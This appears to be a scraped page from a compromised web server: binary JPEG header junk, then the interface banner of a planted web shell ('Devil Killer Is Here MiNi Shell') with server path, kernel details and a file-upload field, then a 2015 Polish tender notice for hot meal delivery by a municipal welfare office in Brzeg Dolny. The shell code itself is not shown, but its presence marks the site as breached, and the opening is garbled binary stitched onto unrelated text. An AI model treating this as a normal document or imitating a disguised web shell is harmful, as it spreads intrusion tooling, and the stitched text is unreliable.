JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/5281-N-2015.html

<p class="kh_header"><b>Brzeg Dolny: Przygotowanie i dostawa posiłków</b><br>
<b>Numer ogłoszenia: 5281 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Rynek 18, 56-120 Brzeg Dolny, woj. dolnośląskie, tel. 071 3195662, 3195787, faks 071 3195662.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.brzegdolny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostawa posiłków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i dostarczenie gorących posiłków (obiadów) o
gramaturze nie mniej niż 500g, smacznych i urozmaiconych, o wysokiej wartości odżywczej, dla ok.
120 osób dziennie. Wszystkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami
i przepisami prawa, w tym w szczególności z zasadami określonymi w ustawie z dnia 25 sierpnia
2006 r. o bezpieczeństwie żywności i żywienia łącznie z przepisami wykonawczymi do tej ustawy
oraz z zachowaniem zasad systemu HACCP, czyli Zasad Dobrej Praktyki Higienicznej oraz Zasad Dobrej Praktyki Produkcyjnej. Produkcja posiłków powinna odbywać się z surowców wysokiej jakości,
świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji dodatkowych -
konserwujących, zagęszczających, z zachowaniem reżimów dietetycznych i sanitarnych.
Urozmaicenie posiłków powinno dotyczyć doboru posiłków, barwy, smaku i zapachu, konsystencji
oraz sposobu przyrządzenia potraw. Nie dopuszcza się produktów typu instant, gotowych sosów i
ziemniaków w proszku (typu puree). Niedopuszczalne jest dostarczanie pieczywa czerstwego lub
wykazującego objawy pleśnienia, psucia, zawilgocenia. Bezwzględnie należy przestrzegać norm na
składniki pokarmowe i produkty spożywcze określone przez Instytut Żywienia i Żywności. 
Wykonawca musi mieć świadomość, że dostarczane przez niego posiłki wydawane będą osobom, dla
których często będzie to jedyny posiłek w ciągu dnia.     Zamawiający szacuje ilość posiłków do
dostarczenia w ramach zamówienia na 38 000 (słownie: trzydzieści osiem tysięcy). Zamawiający
jednocześnie zastrzega prawo do przerwania dostaw w każdym momencie i na każdy okres, w
zależności od ilości osób objętych dożywianiem, a także z innych przyczyn, które uniemożliwią
prawidłowe wykonanie przedmiotu zamówienia. Spadki liczby osób objętych dożywianiem mogą
wnikać z przyczyn niezależnych od Zamawiającego (np. zmiana sytuacji materialnej podopiecznych,
itp.). Mimo wszystko Zamawiający szacuje, że zamówiona zostanie pełna ilość posiłków, a
ewentualne niewykonania oscylować będą w granicach kilku procent.    Wykonawca zobowiązany
będzie do przedkładania Zamawiającemu 10 dniowego jadłospisu na 4 dni przed pierwszym dniem
dostawy w celu jego akceptacji przez Zamawiającego. W tym celu wykonawca wybierze posiłki z listy
przygotowanej przez Zamawiającego poniżej, która stanowić będzie również załącznik nr 1 do
umowy.   Wykonawca powinien dołożyć starań, aby poszczególne posiłki nie powtarzały się zbyt
często w kolejnych dekadówkach. W przypadku braku akceptacji jadłospisu przez Zamawiającego
(np. w przypadku powtarzania się rodzajów posiłków, niezgodności z opisem przedmiotu zamówienia
itp.), Wykonawca zobowiązany będzie do wprowadzenia poprawek.   Każdorazowo dziesięciodniowy
jadłospis powinien zostać sporządzony przy zachowaniu następujących zasad:  - w dekadówce
musi być ujętych minimum 6 posiłków mięsnych (z listy posiłki mięsne poniżej),  - za posiłek
mięsny zostanie uznane takie danie, w którym gramatura mięsa wynosić będzie nie mniej niż 150 g,  
- danie z mięsa mielonego nie więcej niż 2 razy w miesiącu;  - zupa (z wkładką czy bez) nie będzie
traktowana jako posiłek mięsny,  - dopuszcza się maksymalnie 2 zupy na dekadówkę,  -
sosy/tłuszcz/okrasa dodawane do posiłków nie mogą przekraczać 10% wagi całego posiłku,    W
szczególnych przypadkach Zamawiający zastrzega, za zgodą Wykonawcy lub na jego wniosek,
możliwość dokonania zmian w przygotowanym wykazie posiłków, w szczególności w przypadku, gdy
proponowany nowy posiłek będzie bardziej urozmaicony i uwzględniać będzie zastrzeżenia powyżej.  
Zamawiający przygotował wykaz posiłków, z których należy przygotować 10 dniowe jadłospisy.
Gramatura podana w nawiasach oznacza wartości minimalne, z wyłączeniem sosów/tłuszczu/okrasy,
gdzie gramaturę należy rozumieć jako maksymalną dopuszczalną przez Zamawiającego. Tam gdzie
mowa o tłuszczu/sosie należy rozumieć dodatek w postaci sosów/tłuszczu/okrasy w zależności od
rodzaju przygotowanej potrawy.    POSIŁKI MIĘSNE  1. Kotlet schabowy (150g), ziemniaki (240g) z
tłuszczem (10g), surówka (100g).  2. Wątróbka wieprzowa (150g), ziemniaki (240g) z tłuszczem
(10g), surówka (100g).  3. Kotlet mielony (200g), ziemniaki (190g) z tłuszczem (10g), surówka
(100g).  4. Gulasz wieprzowy (200g), ziemniaki (190g) z tłuszczem (10g), surówka (100g).  5.
Kurczak pieczony (200g), ziemniaki (190g) z tłuszczem (10g), surówka (100g).  6. Kiełbasa smażona
(200g) z cebulą (50g), ziemniaki (140g) z tłuszczem (10g), surówka (100g).  7. Pulpety z mięsa
mielonego (150g) w sosie (50g), ziemniaki (200g), surówka (100g).  8. Karkówka duszona (150g) w
sosie (50g), ziemniaki (200g), surówka (100g).  9. Filet z kurczaka (200g), ziemniaki (190g) z
tłuszczem (10g), surówka (100g).  10. Rolada schabowa (200g), ziemniaki (190g) z tłuszczem (10g),
surówka (100g).  11. Stek wieprzowy (200g) z cebulą (50g), ziemniaki (140g) z tłuszczem (10g),
surówka (100g).  12. Pieczeń rzymska (150g) w sosie (50g), ziemniaki (200g), surówka (100g).  13.
Gulasz po węgiersku  (200g) kasza jęczmienna (200g), surówka (100g).  14. Skrzydełka pieczone
(200g), ziemniaki (190g) z tłuszczem (10g), surówka (100g).  15. Żeberka pieczone (200g), ziemniaki
(190g) z tłuszczem (10g), surówka (100g).  16. Świeżonka wieprzowa (200g), ziemniaki (190g) z
tłuszczem (10g), surówka (100g).  17. Kiełbasa biała (150g) w sosie chrzanowym (50g), ziemniaki
(200g), surówka (100g).  18. Kotlet pożarski (200g), ziemniaki (190g) z tłuszczem (10g), surówka
(100g).  19. Kurczak w warzywach (200g), ziemniaki (190g) z tłuszczem (10g), surówka (100g).  20.
Udko pieczone (200g), ziemniaki (190g) z tłuszczem (10g), surówka (100g).    DANIA INNE  1. Gołąbki(250g) w sosie pomidorowym (50g), ziemniaki (200g).  2. Pierogi ruskie (400g), surówka (100g).  3.
Łazanki z kapustą i mięsem (500g).  4. Fasolka po bretońsku (400g), pieczywo (100g).  5. Pierogi z
mięsem (400g), surówka (100g).  6. Kotlet rybny/filet rybny (200g), ziemniaki (190g) z tłuszczem
(10g), surówka (100g).  7. Bigos (400g), pieczywo (100g).  8. Naleśniki z serem (500g).  9.
Zapiekanka makaronowa z warzywami (500g).  10. Placek po cygańsku (500g).    ZUPY   1. Żurek z
jajkiem (400g), pieczywo (100g).  2. Krupnik z wkładką (400g), pieczywo (100g).   3. Kapuśniak z
wkładką (400g), pieczywo (100g).  4. Barszcz ukraiński z żeberkiem (400g), pieczywo (100g).  5.
Zupa grochowa z wkładką (400g), pieczywo (100g).  6. Barszcz biały z wkładką (400g), pieczywo
(100g).       Dostawa gorących posiłków będzie następować w każdym dniu, również w soboty,
niedziele i święta, z wyłączeniem Świąt Wielkanocnych oraz Bożego Narodzenia, w dwa miejsca:  1)
Około 60 posiłków powinno zostać dostarczonych na godz. 12.00 pod adres Urazka 47, 56-120 Brzeg
Dolny;  2) Około 60 posiłków powinno zostać dostarczonych na godz. 12.20 do siedziby
Środowiskowego Domu Samopomocy (ul. Kolejowa 27a, 56-120 Brzeg Dolny), z tym, że w soboty,
niedziele pod adres Zamawiającego (Rynek 18, 56-120 Brzeg Dolny).  W sytuacjach losowych,
Zamawiający zastrzega sobie prawo zmiany wskazanego miejsca (w obrębie miasta Brzeg Dolny) i
terminu dostawy.    Każdy z posiłków powinien być dostarczony w pojemniku jednorazowego użytku
(spełniającym wymogi sanitarne i przystosowanym do kontaktu z żywnością) zapewniającym
odpowiednią temperaturę w momencie dostarczenia (tj. minimalna temperatura zupy powinna
wynosić 75 stopni Celsjusza , drugiego dania 65 stopni Celsjusza, a maksymalna temperatura
produktów zimnych (surówki) 15 stopni Celsjusza) oraz gotowość wydania niezwłocznie po dostawie.
Wraz z posiłkiem Wykonawca zobowiązany jest dostarczyć niezbędne sztućce jednorazowego użytku
(spełniające wymogi sanitarne i przystosowane do kontaktu z żywnością).     Posiłki powinny być
przewożone transportem posiadającym zaświadczenie/decyzję SANEPID na przewóz posiłków.
Sprawy związane z rozładunkiem, przenoszeniem i lokowaniem w miejscu wskazanym przez
pracownika Zamawiającego są każdorazowo obowiązkiem Wykonawcy.   Pracownicy Zamawiającego
zajmować się będą wyłącznie wydawaniem posiłków podopiecznym.    Dostawa (ilość dostarczonych
posiłków) będzie każdorazowo potwierdzana przez przedstawiciela Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w  
wysokości 5 000 zł (słownie złotych: pięć tysięcy 00/100).     2. Wadium można wnieść w formie:  1)
pieniężnej; 2) poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancji bankowej;  4) gwarancji
ubezpieczeniowej;  5) poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji  Rozwoju Przedsiębiorczości (Dz.U.
Nr42, poz 275).      3. Wadium wniesione w formie pieniężnej należy  wpłacić przelewem na rachunek
Zamawiającego: Bank Spółdzielczy Oborniki Śląskie Oddział Brzeg  Dolny nr 67 9583 1022 0100 
1195 2001 0003.     4. W przypadku zamiaru wniesienia wadium w formach, o których mowa wyżej w
ust. 2 pkt 2-5, oryginał dokumentu należy dołączyć do wniosku o dopuszczenie do licytacji
elektronicznej. Wadium wniesione w tych formach musi spełniać następujące wymogi:  1) musi być 
wystawione na Gminny Ośrodek Pomocy Społecznej w Brzegu Dolnym, Rynek 18, 56-10 Brzeg Dolny,
2) zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do 
bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające 
oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i 5 ustawy.    5. Wadium 
musi być wniesione przed upływem terminu składania wniosków o dopuszczenie do licytacji  
elektronicznej, a dowód wpłaty/wniesienia wadium należy dołączyć do wniosku o dopuszczenie do 
licytacji elektronicznej.    6. Zamawiający zatrzyma wadium wraz z odsetkami jeżeli Wykonawca, 
którego oferta została wybrana:  1) odmówił podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie;  2) zawarcie umowy stało się niemożliwe z przyczyn leżących 
po stronie Wykonawcy.    7. Zamawiający zatrzyma wadium wraz z odsetkami jeżeli Wykonawca w 
odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy, nie złożył dokumentów lub 
oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba że udowodni, że 
wynika to z przyczyn nieleżących po jego stronie.    8. W przypadku wadium wnoszonego w 
pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku 
Zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany  
jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie  
oświadczenia (zał. nr 2 do ogłoszenia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest posiadanie doświadczenia w postaci należytego wykonania
(wykonywania) zamówień polegających na przygotowaniu i wydaniu zamawiającym minimum 20 000(słownie: dwudziestu tysięcy) gorących posiłków (obiadów) w okresie sześciu miesięcy. Przez
należyte wykonanie należy rozumieć poziom co najmniej 95 % wszystkich zamówień polegających na
przygotowaniu i wydaniu zamawiającym gorących posiłków, wykonanych (wykonywanych) przez
Wykonawcę.     Wykonawca powinien wykazać się zrealizowaniem (bądź realizowaniem) takich
zamówień w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a
jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W celu spełnienia warunku,
zamówienia można sumować, istotne jest aby łączna ilość przygotowanych i wydanych posiłków w
okresie sześciu miesięcy wyniosła minimum dwadzieścia tysięcy. Dodatkowo, w celu zweryfikowania
rzetelności, kwalifikacji, efektywności i doświadczenia wykonawcy, winien on wykazać zamówienia
niewykonane oraz nienależycie wykonane w ww. okresie. Warunek zostanie spełniony, gdy
Wykonawca w wykazie zamówień (wg. wzoru z zał. Nr 5 do ogłoszenia) wykaże zrealizowanie
wymaganych głównych usług, załączy dowody na potwierdzenie ich należytego wykonania lub
wykonywania, a liczba niewykonanych lub wykonanych nienależycie głównych usług nie będzie
większa niż 5 % wszystkich wykazywanych głównych usług.  Przez główne usługi Zamawiający
rozumie usługi przygotowania i wydania zamawiającym gorących posiłków (obiadów), czyli takie,
które odpowiadają przedmiotowi zamówienia i tylko takie będą brane pod uwagę przy liczeniu
procentowego udziału, o którym mowa wyżej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany  
jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie  
oświadczenia (zał. nr 2 do ogłoszenia)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany  
jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie  
oświadczenia (zał. nr 2 do ogłoszenia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany  
jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie  
oświadczenia (zał. nr 2 do ogłoszenia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez główne usługi Zamawiający rozumie usługi przygotowania i wydania zamawiającym gorących
posiłków (obiadów), czyli takie, które odpowiadają przedmiotowi zamówienia.    Wykonawca powinien
wykazać się zrealizowaniem (bądź realizowaniem) takich zamówień w okresie ostatnich 3 lat przed
dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie.   Dodatkowo, w celu zweryfikowania rzetelności, kwalifikacji, efektywności i
doświadczenia wykonawcy, winien on wykazać główne usługi niewykonane oraz nienależycie
wykonane w ww. okresie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż dopuszczalna będzie zmiana terminu wykonania umowy, w przypadku gdy
zmiana taka będzie korzystna dla Zamawiającego.  Zamawiający przewiduje także możliwość
dokonania istotnych zmian do umowy w sytuacji zmiany stawki podatku od towarów i usług na
elementy objęte zamówieniem. W przypadku zmiany ustawowej stawki podatku od towarów i usług,
na wniosek Wykonawcy lub Zamawiającego strony dokonają zmiany umowy w sposób odpowiednio
uwzględniający zmianę stawki podatku od towarów i usług. Do czasu dokonania zmiany umowy w
tym zakresie ryzyko wzrostu stawki podatku od towarów i usług oraz związane z tym ewentualne
koszty obciążają Wykonawcę.    Liczba 120 posiłków dziennie jest wielkością szacunkową. Faktyczna
ilość posiłków do dostarczenia będzie wynikać z potwierdzonych partii. Wykonawca nie może żądać
wynagrodzenia za ewentualnie niedostarczoną ilość posiłków. Zamawiający jednocześnie zastrzega
prawo do ograniczenia i przerwania dostaw w każdym momencie i na każdy okres, w zależności od
ilości osób objętych dożywianiem, a także z innych przyczyn, które uniemożliwią prawidłowe
wykonanie przedmiotu zamówienia.   Zmiany postanowień umowy bez stosunku do treści oferty
wybranego Wykonawcy będą dokonywane sukcesywnie, tak aby jak najlepiej oddać istotę
przedmiotu zamówienia oraz w celu wyeliminowania nieskutecznych zapisów umownych. 
Strona
dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty
przemawiające za dokonaniem zmian do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://gops.brzegdolny.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Licytacja elektroniczna zostanie przeprowadzona na Platformie Licytacji Elektronicznej
udostępnionej przez Urząd Zamówień Publicznych pod adresem: https://licytacje.uzp.gov.pl 2.
Wymagania formalne: 2.1.Wykonawca chcący wziąć udział w licytacji elektronicznej jest zobowiązany
do dokonania uprzedniej rejestracji na platformie licytacji elektronicznych Urzędu Zamówień
Publicznych, zwanej dalej platformą, zamieszczonej na stronie: https://licytacje.uzp.gov.pl (o ile nie
jest jeszcze zarejestrowany). Korzystanie z platformy jest bezpłatne. Jedynym warunkiem jest  
zarejestrowanie się w systemie (nie jest wymagany podpis elektroniczny). 2.2. aby Zamawiający miał
możliwość dopuszczenia Wykonawcy do udziału w licytacji, Wykonawca wraz z wnioskiem o
dopuszczenie do udziału w licytacji elektronicznej musi przekazać Zamawiającemu swój LOGIN, który
otrzyma po zarejestrowaniu się na platformie. W przypadku podania przez Wykonawcę
niewłaściwego LOGINU (LOGIN należy podać dokładnie stosując te same znaki, w tym duże i małe
litery, spacje - jeżeli takie zastosowano przy rejestracji) bądź nie przekazania go Zamawiającemu 
wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej, Wykonawca zobowiązany jest
do jego przekazania Zamawiającemu najpóźniej do godz. 12:00 na dzień przed terminem otwarcia
licytacji. Nie dostarczenie prawidłowego LOGINU w terminie określonym powyżej będzie traktowane
jako odstąpienie Wykonawcy od dalszego postępowania. 3. Wymagania techniczne: Wykonawca
powinien posiadać urządzenia informatyczne, umożliwiające sprawne korzystanie z systemu, tj.
komputer klasy PC z systemem operacyjnym Windows/Linux z zainstalowaną przeglądarką
internetową MS Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub
wyższej, podłączony do sieci Internet.</p>
